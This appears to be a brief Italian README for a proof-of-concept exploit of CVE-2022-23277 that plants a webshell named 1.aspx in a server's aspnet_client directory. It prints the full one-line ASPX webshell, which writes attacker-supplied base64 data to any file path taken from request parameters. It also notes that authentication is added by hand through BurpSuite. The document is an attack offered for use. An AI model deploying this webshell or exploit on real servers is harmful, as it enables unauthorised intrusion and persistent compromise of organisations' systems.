
CVE-2022-23277 POC per scrivere una webshell in aspnet_client
La parte di autenticazione deve essere aggiunta manualmente tramite BurpSuite. Dopo lo sfruttamento riuscito, verrà scritto 1.aspx nella directory aspnet_client.
webshell:
<%@ Page Language="JScript" Debug="true"%><%@Import Namespace="System.IO"%><%File.WriteAllBytes(Request["b"], Convert.FromBase64String(Request["a"]));%>
Per i dettagli sullo sfruttamento, fare riferimento al nostro articolo.
